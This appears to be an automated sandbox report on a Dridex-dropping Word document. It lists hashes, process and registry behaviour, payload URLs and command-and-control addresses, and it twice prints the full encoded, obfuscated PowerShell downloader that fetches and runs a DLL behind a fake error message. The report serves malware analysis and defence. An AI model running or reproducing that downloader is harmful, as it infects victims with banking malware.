Analysis
-
max time kernel
138s -
max time network
139s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
20-11-2020 05:27
Static task
static1
Behavioral task
behavioral1
Sample
Information-822908953.doc
Resource
win7v20201028
General
-
Target
Information-822908953.doc
-
Size
117KB
-
MD5
59b5d3179a962efa890e2df17aaf31d1
-
SHA1
52b0231b64030049d61096bd2bb872ab89ac7e55
-
SHA256
d2bc5e480daba7368064d7de34a53077e968dafc86084c87191c5c3d2fb7c444
-
SHA512
4bbb5fbd99e9ae35f690dcc710d8ba168cf5361fd4857f5b9b341185834a9d1e19f641a47cf6ea18366d6f2d13e1ce457b53c12f9264b9da5fe38d02b1a29432
Malware Config
Extracted
http://veva.vn/zntk070.png
http://hardmed-eg.com/o76nxa.png
http://islamabout.com/ga140h7l.zip
http://ferretec.com/c2eivsswg.rar
http://rasadbar.ir/t6yswb.pdf
http://seniorcarecompass.inifaresworkshops.com/vr6ebzold.png
Extracted
dridex
10555
162.241.44.26:9443
192.232.229.53:4443
77.220.64.34:443
193.90.12.121:3098
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2620 3460 cmd.exe -
Processes:
resource yara_rule C:\Users\Admin\E1bad5e\Rvmn7kd\Fhdtme10.dll cryptone \Users\Admin\E1bad5e\Rvmn7kd\Fhdtme10.dll cryptone -
Processes:
resource yara_rule behavioral2/memory/744-15-0x0000000000BF0000-0x0000000000C2D000-memory.dmp dridex_ldr -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exerundll32.exeflow pid process 21 2116 powershell.exe 29 744 rundll32.exe 30 744 rundll32.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 744 rundll32.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
rundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA rundll32.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 640 WINWORD.EXE 640 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 2116 powershell.exe 2116 powershell.exe 2116 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2116 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 640 WINWORD.EXE 640 WINWORD.EXE 640 WINWORD.EXE 640 WINWORD.EXE 640 WINWORD.EXE 640 WINWORD.EXE 640 WINWORD.EXE -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
cmd.exepowershell.exerundll32.exedescription pid process target process PID 2620 wrote to memory of 1172 2620 cmd.exe msg.exe PID 2620 wrote to memory of 1172 2620 cmd.exe msg.exe PID 2620 wrote to memory of 2116 2620 cmd.exe powershell.exe PID 2620 wrote to memory of 2116 2620 cmd.exe powershell.exe PID 2116 wrote to memory of 772 2116 powershell.exe rundll32.exe PID 2116 wrote to memory of 772 2116 powershell.exe rundll32.exe PID 772 wrote to memory of 744 772 rundll32.exe rundll32.exe PID 772 wrote to memory of 744 772 rundll32.exe rundll32.exe PID 772 wrote to memory of 744 772 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Information-822908953.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.execmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD UwBWACAAIAB0ADQAQgA3AGsAIAAoACAAWwBUAFkAUABFAF0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9AHsAMwB9ACIALQBmACcAbwAuAEQAaQAnACwAJwBzAFkAcwBUAEUATQAnACwAJwAuAGkAJwAsACcAUgBlAGMAdABvAHIAWQAnACkAIAAgACkAOwAgACAAIAAgACQARgAzADUAQwA4AFgAIAAgAD0AIAAgAFsAdAB5AFAARQBdACgAIgB7ADQAfQB7ADEAfQB7ADIAfQB7ADcAfQB7ADAAfQB7ADYAfQB7ADUAfQB7ADMAfQB7ADgAfQAiACAALQBmACAAJwBDAGUAcABPAEkAJwAsACcAeQBzAFQAZQBtAC4AbgBFAFQALgBzAEUAJwAsACcAUgBWACcALAAnAEEATgBBAGcAZQAnACwAJwBzACcALAAnAHQATQAnACwAJwBOACcALAAnAEkAJwAsACcAUgAnACkAOwAgACAAJABYAGsAYgA3AHIANQBsAD0AKAAoACcAQgA3ACcAKwAnAGYAJwApACsAJwBfACcAKwAoACcAeQAnACsAJwBnAHkAJwApACkAOwAkAFUAZwBsAHAAeABtAGcAPQAkAE0AXwBzADAAeABxADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFQANAAxAGIAbwBpAGEAOwAkAEMAcAB0AG4AawBrAGUAPQAoACgAJwBLADAAJwArACcAMAAnACkAKwAoACcAaQAnACsAJwB6AGUAdgAnACkAKQA7ACAAKAAgACAAZwBFAHQALQB2AGEAcgBJAEEAYgBMAEUAIAAgAHQANABiADcASwAgACAALQB2AEEATABVAGUAbwBuAEwAeQAgACAAKQA6ADoAIgBjAHIARQBBAHQAYABFAGAARABpAFIAYABFAEMAYABUAE8AUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACgAJwBFADEAYgAnACsAJwBhACcAKQArACcAZAA1ACcAKwAnAGUAewAwAH0AUgB2AG0AJwArACcAbgAnACsAJwA3AGsAZAB7ADAAfQAnACkALQBGACAAIABbAEMASABBAFIAXQA5ADIAKQApADsAJABZADcANwA4ADMAZQBqAD0AKAAnAEwAcQAnACsAJwBmAHoAJwArACgAJwBlACcAKwAnAGsAegAnACkAKQA7ACAAIAAkAEYAMwA1AGMAOABYADoAOgAiAFMARQBgAEMAdQBgAFIAaQBUAGAAeQBwAHIAYABPAFQATwBjAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwB5ADgAaQB5AGsAZwA9ACgAKAAnAFcAZgAnACsAJwB1AHkAJwApACsAJwByACcAKwAnAHcAOAAnACkAOwAkAEsANgBiAG8AdwAxAHcAIAA9ACAAKAAnAEYAaAAnACsAKAAnAGQAdAAnACsAJwBtAGUAJwApACsAJwAxADAAJwApADsAJABCADkANgBmAHAAagBlAD0AKAAoACcARABuAGEAJwArACcAaAAnACkAKwAnAG4ANQAnACsAJwB4ACcAKQA7ACQAUgBiAHgAdQB2AF8ANQA9ACgAJwBOACcAKwAoACcAcwA4AGgAJwArACcAZgByACcAKQArACcAMgAnACkAOwAkAFUAeQB2AHoAeQB5AHEAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBFADEAYgAnACsAKAAnAGEAJwArACcAZAA1AGUAJwApACsAJwB7ADAAJwArACcAfQAnACsAKAAnAFIAdgBtAG4AJwArACcANwBrACcAKQArACcAZAB7ADAAfQAnACkALQBGAFsAYwBIAGEAcgBdADkAMgApACsAJABLADYAYgBvAHcAMQB3ACsAKAAoACcALgBkACcAKwAnAGwAJwApACsAJwBsACcAKQA7ACQAWQBiAHcAbgBsAGIAcQA9ACgAKAAnAEwAbgBtACcAKwAnAGoANwAnACkAKwAnAG8AJwArACcANQAnACkAOwAkAEYAawA3AGUAYQByAF8APQBOAGAAZQBXAC0AYABvAGAAQgBqAEUAYwB0ACAATgBlAFQALgB3AGUAQgBDAGwASQBlAE4AVAA7ACQATwBtAGkAcQAxAHMAaQA9ACgAKAAnAGgAdAAnACsAKAAnAHQAcAAnACsAJwA6AFEAJwApACsAJwApACcAKwAoACgAJwAoAHEAZAAnACsAJwBkACkAKAAnACkAKQArACgAKAAnAFEAKQAnACsAJwAoAHEAZAAnACkAKQArACgAKAAnAGQAKQAnACsAJwAoAHYAJwApACkAKwAoACgAJwBlAHYAJwArACcAYQAuAHYAbgBRACcAKwAnACkAKAAnACkAKQArACgAKAAnAHEAZAAnACsAJwBkACkAKAAnACkAKQArACgAJwB6AG4AdABrACcAKwAnADAAJwApACsAKAAnADcAMAAuACcAKwAnAHAAbgAnACkAKwAnAGcAQAAnACsAKAAnAGgAdAAnACsAJwB0AHAAOgBRACcAKQArACgAKAAnACkAKAAnACkAKQArACgAJwBxACcAKwAnAGQAZAAnACkAKwAoACgAJwApACgAJwApACkAKwAnAFEAJwArACgAKAAnACkAKAAnACkAKQArACcAcQAnACsAJwBkACcAKwAnAGQAJwArACcAKQAnACsAKAAoACcAKAAnACsAJwBoAGEAJwApACkAKwAoACcAcgBkACcAKwAnAG0AJwApACsAKAAnAGUAJwArACcAZAAtACcAKQArACcAZQAnACsAJwBnACcAKwAoACcALgBjACcAKwAnAG8AJwApACsAJwBtACcAKwAoACgAJwBRACkAJwApACkAKwAoACgAJwAoAHEAZAAnACsAJwBkACkAJwArACcAKABvACcAKQApACsAKAAnADcAJwArACcANgBuAHgAJwApACsAJwBhAC4AJwArACgAJwBwAG4AJwArACcAZwAnACkAKwAnAEAAaAAnACsAJwB0AHQAJwArACgAJwBwACcAKwAnADoAUQAnACkAKwAoACgAJwApACgAcQAnACsAJwBkACcAKwAnAGQAKQAnACkAKQArACgAKAAnACgAUQAnACkAKQArACcAKQAnACsAKAAnACgAJwArACcAcQBkAGQAKQAnACkAKwAoACgAJwAoAGkAJwApACkAKwAnAHMAbAAnACsAJwBhACcAKwAnAG0AJwArACgAJwBhAGIAbwB1ACcAKwAnAHQAJwApACsAKAAoACcALgBjACcAKwAnAG8AbQBRACcAKwAnACkAKABxAGQAZAAnACkAKQArACgAKAAnACkAKABnAGEAMQAnACsAJwA0ADAAJwArACcAaAA3AGwALgB6ACcAKwAnAGkAcAAnACkAKQArACcAQABoACcAKwAoACcAdAB0ACcAKwAnAHAAJwApACsAJwA6ACcAKwAoACgAJwBRACkAJwApACkAKwAoACgAJwAoAHEAJwArACcAZAAnACkAKQArACgAKAAnAGQAKQAnACkAKQArACcAKAAnACsAKAAoACcAUQApACgAcQAnACsAJwBkAGQAKQAoACcAKQApACsAKAAnAGYAZQByACcAKwAnAHIAZQB0AGUAJwArACcAYwAnACkAKwAnAC4AYwAnACsAKAAoACcAbwBtAFEAKQAoACcAKwAnAHEAZAAnACkAKQArACgAKAAnAGQAKQAoAGMAMgAnACsAJwBlAGkAdgAnACsAJwBzACcAKwAnAHMAdwBnAC4AJwArACcAcgBhAHIAJwApACkAKwAoACcAQAAnACsAJwBoAHQAdAAnACkAKwAnAHAAOgAnACsAKAAoACcAUQApACcAKQApACsAKAAnACgAcQBkAGQAJwArACcAKQAnACkAKwAnACgAJwArACgAKAAnAFEAKQAnACkAKQArACcAKAAnACsAJwBxACcAKwAoACgAJwBkAGQAJwArACcAKQAnACkAKQArACgAJwAoACcAKwAnAHIAYQBzAGEAZABiAGEAcgAuACcAKwAnAGkAcgBRACkAJwApACsAKAAoACcAKAAnACsAJwBxAGQAJwApACkAKwAnAGQAJwArACgAKAAnACkAJwArACcAKAB0ADYAeQBzACcAKwAnAHcAYgAuAHAAJwApACkAKwAoACcAZABmACcAKwAnAEAAJwApACsAJwBoAHQAJwArACcAdAAnACsAJwBwADoAJwArACgAKAAnAFEAKQAnACkAKQArACgAJwAoAHEAZAAnACsAJwBkACcAKwAnACkAKABRACkAJwApACsAKAAoACcAKABxACcAKQApACsAJwBkACcAKwAoACgAJwBkACkAJwApACkAKwAoACgAJwAoACcAKwAnAHMAZQBuACcAKwAnAGkAbwAnACkAKQArACcAcgBjACcAKwAnAGEAcgAnACsAJwBlAGMAJwArACgAJwBvAG0AcABhACcAKwAnAHMAJwApACsAJwBzACcAKwAoACcALgAnACsAJwBpAG4AJwApACsAKAAnAGkAJwArACcAZgBhACcAKQArACcAcgBlACcAKwAoACcAcwB3ACcAKwAnAG8AcgBrACcAKQArACcAcwAnACsAJwBoAG8AJwArACcAcAAnACsAJwBzACcAKwAnAC4AJwArACcAYwAnACsAKAAoACcAbwBtAFEAJwArACcAKQAnACkAKQArACgAKAAnACgAcQBkAGQAJwArACcAKQAoACcAKQApACsAKAAnAHYAJwArACcAcgA2AGUAYgB6ACcAKwAnAG8AbABkAC4AJwArACcAcABuAGcAJwApACsAJwBAACcAKQApAC4AIgBSAGUAcABMAGEAYABDAEUAIgAoACgAKAAoACgAJwBRACcAKwAnACkAKAAnACkAKQArACgAKAAnAHEAZAAnACsAJwBkACkAKAAnACkAKQApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAGgAdwAnACsAJwBlACcAKQApAFsAMABdACkALgAiAFMAUABgAEwAaQB0ACIAKAAkAEwANQB5AGQAYwBvAHYAIAArACAAJABVAGcAbABwAHgAbQBnACAAKwAgACQAQwBrAHgAOABuADkAZQApADsAJABQAGMAagBsAGgAawBvAD0AKAAnAFAAMQAnACsAKAAnAGUAJwArACcAaQB4AHUAeQAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVQB5ADMAOQBnAF8AdgAgAGkAbgAgACQATwBtAGkAcQAxAHMAaQAgAHwAIABTAGAATwBgAFIAYABUAC0AbwBiAGoAYABFAGMAVAAgAHsAZwBFAGAAVAAtAFIAQQBgAE4AZABgAG8AbQB9ACkAewB0AHIAeQB7ACQARgBrADcAZQBhAHIAXwAuACIARABgAG8AVwBuAEwATwBhAGAARABGAGAASQBsAEUAIgAoACQAVQB5ADMAOQBnAF8AdgAsACAAJABVAHkAdgB6AHkAeQBxACkAOwAkAFIAcwAyAG0ANQB5ADcAPQAoACgAJwBNACcAKwAnAHQAagAnACkAKwAoACcAYgAnACsAJwBwAHQAdQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABVAHkAdgB6AHkAeQBxACkALgAiAEwARQBOAGcAYABUAGgAIgAgAC0AZwBlACAANAAwADQAMAAwACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuAGQAbAAnACsAJwBsADMAMgAuAGUAeABlACcAKQAgACQAVQB5AHYAegB5AHkAcQAsADAAOwAkAFIAeAA1AGYAcwBnAGcAPQAoACgAJwBBAHMAJwArACcAbgBrACcAKQArACgAJwBuACcAKwAnAHEAdQAnACkAKQA7AGIAcgBlAGEAawA7ACQATQBpADYAZwA0ADYAMAA9ACgAKAAnAFMAJwArACcANgB6ACcAKQArACcAYQAnACsAKAAnAG0AJwArACcAaQBiACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABQAF8AMAA4ADYAXwBnAD0AKAAoACcATwAnACsAJwA5ADUAZwAnACkAKwAnAHQAJwArACcAawBkACcAKQA=1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\msg.exemsg Admin /v Word experienced an error trying to open the file.2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOwersheLL -w hidden -ENCOD UwBWACAAIAB0ADQAQgA3AGsAIAAoACAAWwBUAFkAUABFAF0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9AHsAMwB9ACIALQBmACcAbwAuAEQAaQAnACwAJwBzAFkAcwBUAEUATQAnACwAJwAuAGkAJwAsACcAUgBlAGMAdABvAHIAWQAnACkAIAAgACkAOwAgACAAIAAgACQARgAzADUAQwA4AFgAIAAgAD0AIAAgAFsAdAB5AFAARQBdACgAIgB7ADQAfQB7ADEAfQB7ADIAfQB7ADcAfQB7ADAAfQB7ADYAfQB7ADUAfQB7ADMAfQB7ADgAfQAiACAALQBmACAAJwBDAGUAcABPAEkAJwAsACcAeQBzAFQAZQBtAC4AbgBFAFQALgBzAEUAJwAsACcAUgBWACcALAAnAEEATgBBAGcAZQAnACwAJwBzACcALAAnAHQATQAnACwAJwBOACcALAAnAEkAJwAsACcAUgAnACkAOwAgACAAJABYAGsAYgA3AHIANQBsAD0AKAAoACcAQgA3ACcAKwAnAGYAJwApACsAJwBfACcAKwAoACcAeQAnACsAJwBnAHkAJwApACkAOwAkAFUAZwBsAHAAeABtAGcAPQAkAE0AXwBzADAAeABxADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFQANAAxAGIAbwBpAGEAOwAkAEMAcAB0AG4AawBrAGUAPQAoACgAJwBLADAAJwArACcAMAAnACkAKwAoACcAaQAnACsAJwB6AGUAdgAnACkAKQA7ACAAKAAgACAAZwBFAHQALQB2AGEAcgBJAEEAYgBMAEUAIAAgAHQANABiADcASwAgACAALQB2AEEATABVAGUAbwBuAEwAeQAgACAAKQA6ADoAIgBjAHIARQBBAHQAYABFAGAARABpAFIAYABFAEMAYABUAE8AUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACgAJwBFADEAYgAnACsAJwBhACcAKQArACcAZAA1ACcAKwAnAGUAewAwAH0AUgB2AG0AJwArACcAbgAnACsAJwA3AGsAZAB7ADAAfQAnACkALQBGACAAIABbAEMASABBAFIAXQA5ADIAKQApADsAJABZADcANwA4ADMAZQBqAD0AKAAnAEwAcQAnACsAJwBmAHoAJwArACgAJwBlACcAKwAnAGsAegAnACkAKQA7ACAAIAAkAEYAMwA1AGMAOABYADoAOgAiAFMARQBgAEMAdQBgAFIAaQBUAGAAeQBwAHIAYABPAFQATwBjAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwB5ADgAaQB5AGsAZwA9ACgAKAAnAFcAZgAnACsAJwB1AHkAJwApACsAJwByACcAKwAnAHcAOAAnACkAOwAkAEsANgBiAG8AdwAxAHcAIAA9ACAAKAAnAEYAaAAnACsAKAAnAGQAdAAnACsAJwBtAGUAJwApACsAJwAxADAAJwApADsAJABCADkANgBmAHAAagBlAD0AKAAoACcARABuAGEAJwArACcAaAAnACkAKwAnAG4ANQAnACsAJwB4ACcAKQA7ACQAUgBiAHgAdQB2AF8ANQA9ACgAJwBOACcAKwAoACcAcwA4AGgAJwArACcAZgByACcAKQArACcAMgAnACkAOwAkAFUAeQB2AHoAeQB5AHEAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBFADEAYgAnACsAKAAnAGEAJwArACcAZAA1AGUAJwApACsAJwB7ADAAJwArACcAfQAnACsAKAAnAFIAdgBtAG4AJwArACcANwBrACcAKQArACcAZAB7ADAAfQAnACkALQBGAFsAYwBIAGEAcgBdADkAMgApACsAJABLADYAYgBvAHcAMQB3ACsAKAAoACcALgBkACcAKwAnAGwAJwApACsAJwBsACcAKQA7ACQAWQBiAHcAbgBsAGIAcQA9ACgAKAAnAEwAbgBtACcAKwAnAGoANwAnACkAKwAnAG8AJwArACcANQAnACkAOwAkAEYAawA3AGUAYQByAF8APQBOAGAAZQBXAC0AYABvAGAAQgBqAEUAYwB0ACAATgBlAFQALgB3AGUAQgBDAGwASQBlAE4AVAA7ACQATwBtAGkAcQAxAHMAaQA9ACgAKAAnAGgAdAAnACsAKAAnAHQAcAAnACsAJwA6AFEAJwApACsAJwApACcAKwAoACgAJwAoAHEAZAAnACsAJwBkACkAKAAnACkAKQArACgAKAAnAFEAKQAnACsAJwAoAHEAZAAnACkAKQArACgAKAAnAGQAKQAnACsAJwAoAHYAJwApACkAKwAoACgAJwBlAHYAJwArACcAYQAuAHYAbgBRACcAKwAnACkAKAAnACkAKQArACgAKAAnAHEAZAAnACsAJwBkACkAKAAnACkAKQArACgAJwB6AG4AdABrACcAKwAnADAAJwApACsAKAAnADcAMAAuACcAKwAnAHAAbgAnACkAKwAnAGcAQAAnACsAKAAnAGgAdAAnACsAJwB0AHAAOgBRACcAKQArACgAKAAnACkAKAAnACkAKQArACgAJwBxACcAKwAnAGQAZAAnACkAKwAoACgAJwApACgAJwApACkAKwAnAFEAJwArACgAKAAnACkAKAAnACkAKQArACcAcQAnACsAJwBkACcAKwAnAGQAJwArACcAKQAnACsAKAAoACcAKAAnACsAJwBoAGEAJwApACkAKwAoACcAcgBkACcAKwAnAG0AJwApACsAKAAnAGUAJwArACcAZAAtACcAKQArACcAZQAnACsAJwBnACcAKwAoACcALgBjACcAKwAnAG8AJwApACsAJwBtACcAKwAoACgAJwBRACkAJwApACkAKwAoACgAJwAoAHEAZAAnACsAJwBkACkAJwArACcAKABvACcAKQApACsAKAAnADcAJwArACcANgBuAHgAJwApACsAJwBhAC4AJwArACgAJwBwAG4AJwArACcAZwAnACkAKwAnAEAAaAAnACsAJwB0AHQAJwArACgAJwBwACcAKwAnADoAUQAnACkAKwAoACgAJwApACgAcQAnACsAJwBkACcAKwAnAGQAKQAnACkAKQArACgAKAAnACgAUQAnACkAKQArACcAKQAnACsAKAAnACgAJwArACcAcQBkAGQAKQAnACkAKwAoACgAJwAoAGkAJwApACkAKwAnAHMAbAAnACsAJwBhACcAKwAnAG0AJwArACgAJwBhAGIAbwB1ACcAKwAnAHQAJwApACsAKAAoACcALgBjACcAKwAnAG8AbQBRACcAKwAnACkAKABxAGQAZAAnACkAKQArACgAKAAnACkAKABnAGEAMQAnACsAJwA0ADAAJwArACcAaAA3AGwALgB6ACcAKwAnAGkAcAAnACkAKQArACcAQABoACcAKwAoACcAdAB0ACcAKwAnAHAAJwApACsAJwA6ACcAKwAoACgAJwBRACkAJwApACkAKwAoACgAJwAoAHEAJwArACcAZAAnACkAKQArACgAKAAnAGQAKQAnACkAKQArACcAKAAnACsAKAAoACcAUQApACgAcQAnACsAJwBkAGQAKQAoACcAKQApACsAKAAnAGYAZQByACcAKwAnAHIAZQB0AGUAJwArACcAYwAnACkAKwAnAC4AYwAnACsAKAAoACcAbwBtAFEAKQAoACcAKwAnAHEAZAAnACkAKQArACgAKAAnAGQAKQAoAGMAMgAnACsAJwBlAGkAdgAnACsAJwBzACcAKwAnAHMAdwBnAC4AJwArACcAcgBhAHIAJwApACkAKwAoACcAQAAnACsAJwBoAHQAdAAnACkAKwAnAHAAOgAnACsAKAAoACcAUQApACcAKQApACsAKAAnACgAcQBkAGQAJwArACcAKQAnACkAKwAnACgAJwArACgAKAAnAFEAKQAnACkAKQArACcAKAAnACsAJwBxACcAKwAoACgAJwBkAGQAJwArACcAKQAnACkAKQArACgAJwAoACcAKwAnAHIAYQBzAGEAZABiAGEAcgAuACcAKwAnAGkAcgBRACkAJwApACsAKAAoACcAKAAnACsAJwBxAGQAJwApACkAKwAnAGQAJwArACgAKAAnACkAJwArACcAKAB0ADYAeQBzACcAKwAnAHcAYgAuAHAAJwApACkAKwAoACcAZABmACcAKwAnAEAAJwApACsAJwBoAHQAJwArACcAdAAnACsAJwBwADoAJwArACgAKAAnAFEAKQAnACkAKQArACgAJwAoAHEAZAAnACsAJwBkACcAKwAnACkAKABRACkAJwApACsAKAAoACcAKABxACcAKQApACsAJwBkACcAKwAoACgAJwBkACkAJwApACkAKwAoACgAJwAoACcAKwAnAHMAZQBuACcAKwAnAGkAbwAnACkAKQArACcAcgBjACcAKwAnAGEAcgAnACsAJwBlAGMAJwArACgAJwBvAG0AcABhACcAKwAnAHMAJwApACsAJwBzACcAKwAoACcALgAnACsAJwBpAG4AJwApACsAKAAnAGkAJwArACcAZgBhACcAKQArACcAcgBlACcAKwAoACcAcwB3ACcAKwAnAG8AcgBrACcAKQArACcAcwAnACsAJwBoAG8AJwArACcAcAAnACsAJwBzACcAKwAnAC4AJwArACcAYwAnACsAKAAoACcAbwBtAFEAJwArACcAKQAnACkAKQArACgAKAAnACgAcQBkAGQAJwArACcAKQAoACcAKQApACsAKAAnAHYAJwArACcAcgA2AGUAYgB6ACcAKwAnAG8AbABkAC4AJwArACcAcABuAGcAJwApACsAJwBAACcAKQApAC4AIgBSAGUAcABMAGEAYABDAEUAIgAoACgAKAAoACgAJwBRACcAKwAnACkAKAAnACkAKQArACgAKAAnAHEAZAAnACsAJwBkACkAKAAnACkAKQApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAGgAdwAnACsAJwBlACcAKQApAFsAMABdACkALgAiAFMAUABgAEwAaQB0ACIAKAAkAEwANQB5AGQAYwBvAHYAIAArACAAJABVAGcAbABwAHgAbQBnACAAKwAgACQAQwBrAHgAOABuADkAZQApADsAJABQAGMAagBsAGgAawBvAD0AKAAnAFAAMQAnACsAKAAnAGUAJwArACcAaQB4AHUAeQAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVQB5ADMAOQBnAF8AdgAgAGkAbgAgACQATwBtAGkAcQAxAHMAaQAgAHwAIABTAGAATwBgAFIAYABUAC0AbwBiAGoAYABFAGMAVAAgAHsAZwBFAGAAVAAtAFIAQQBgAE4AZABgAG8AbQB9ACkAewB0AHIAeQB7ACQARgBrADcAZQBhAHIAXwAuACIARABgAG8AVwBuAEwATwBhAGAARABGAGAASQBsAEUAIgAoACQAVQB5ADMAOQBnAF8AdgAsACAAJABVAHkAdgB6AHkAeQBxACkAOwAkAFIAcwAyAG0ANQB5ADcAPQAoACgAJwBNACcAKwAnAHQAagAnACkAKwAoACcAYgAnACsAJwBwAHQAdQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABVAHkAdgB6AHkAeQBxACkALgAiAEwARQBOAGcAYABUAGgAIgAgAC0AZwBlACAANAAwADQAMAAwACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuAGQAbAAnACsAJwBsADMAMgAuAGUAeABlACcAKQAgACQAVQB5AHYAegB5AHkAcQAsADAAOwAkAFIAeAA1AGYAcwBnAGcAPQAoACgAJwBBAHMAJwArACcAbgBrACcAKQArACgAJwBuACcAKwAnAHEAdQAnACkAKQA7AGIAcgBlAGEAawA7ACQATQBpADYAZwA0ADYAMAA9ACgAKAAnAFMAJwArACcANgB6ACcAKQArACcAYQAnACsAKAAnAG0AJwArACcAaQBiACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABQAF8AMAA4ADYAXwBnAD0AKAAoACcATwAnACsAJwA5ADUAZwAnACkAKwAnAHQAJwArACcAawBkACcAKQA=2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\E1bad5e\Rvmn7kd\Fhdtme10.dll,03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\E1bad5e\Rvmn7kd\Fhdtme10.dll,04⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Checks whether UAC is enabled
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\E1bad5e\Rvmn7kd\Fhdtme10.dllMD5
429d63af6c900c0c2f7c2b82dec86a7e
SHA16f3c788b9223c6d99d34235c86bcc00056a2c73f
SHA256b6c782d71a48aaf6b23d0c9f2f6490c008d8f3f87d43b3c1a6f18343ddc63874
SHA5120f1cc54093f788e6549cc0149f2d0d3c52e82b76222a4563c995c3bc8c207f4a2583f585b4f0ae522c85a5994a9953238c094e589cfcab3f4688ac9dd244ff4c
-
\Users\Admin\E1bad5e\Rvmn7kd\Fhdtme10.dllMD5
429d63af6c900c0c2f7c2b82dec86a7e
SHA16f3c788b9223c6d99d34235c86bcc00056a2c73f
SHA256b6c782d71a48aaf6b23d0c9f2f6490c008d8f3f87d43b3c1a6f18343ddc63874
SHA5120f1cc54093f788e6549cc0149f2d0d3c52e82b76222a4563c995c3bc8c207f4a2583f585b4f0ae522c85a5994a9953238c094e589cfcab3f4688ac9dd244ff4c
-
memory/640-0-0x00007FFC2FE90000-0x00007FFC304C7000-memory.dmpFilesize
6.2MB
-
memory/744-13-0x0000000000000000-mapping.dmp
-
memory/744-15-0x0000000000BF0000-0x0000000000C2D000-memory.dmpFilesize
244KB
-
memory/772-11-0x0000000000000000-mapping.dmp
-
memory/1172-6-0x0000000000000000-mapping.dmp
-
memory/2116-7-0x0000000000000000-mapping.dmp
-
memory/2116-8-0x00007FFC28F10000-0x00007FFC298FC000-memory.dmpFilesize
9.9MB
-
memory/2116-9-0x000001CEF0FC0000-0x000001CEF0FC1000-memory.dmpFilesize
4KB
-
memory/2116-10-0x000001CEF11C0000-0x000001CEF11C1000-memory.dmpFilesize
4KB